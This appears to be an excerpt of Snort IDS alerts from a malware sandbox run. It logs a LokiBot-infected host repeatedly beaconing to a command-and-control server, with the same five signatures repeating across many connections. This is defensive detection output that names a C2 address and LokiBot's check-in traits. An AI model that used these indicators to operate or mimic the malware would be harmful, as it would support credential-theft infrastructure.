                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49195
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49196
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49197
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49198
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49199
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49200
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49201
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49202
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49203
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49204
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49205
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49206
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49207
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49208
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49209
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49210
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49211
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49212
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49213
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49214
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49215
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49216
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49217
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49218
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49219
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49220
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49221
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49222
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49223
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49224
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49225
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49226
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49227
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49228
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49229
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49230
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49231
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49232
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49233
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49234
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49235
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49236
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49237
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49238
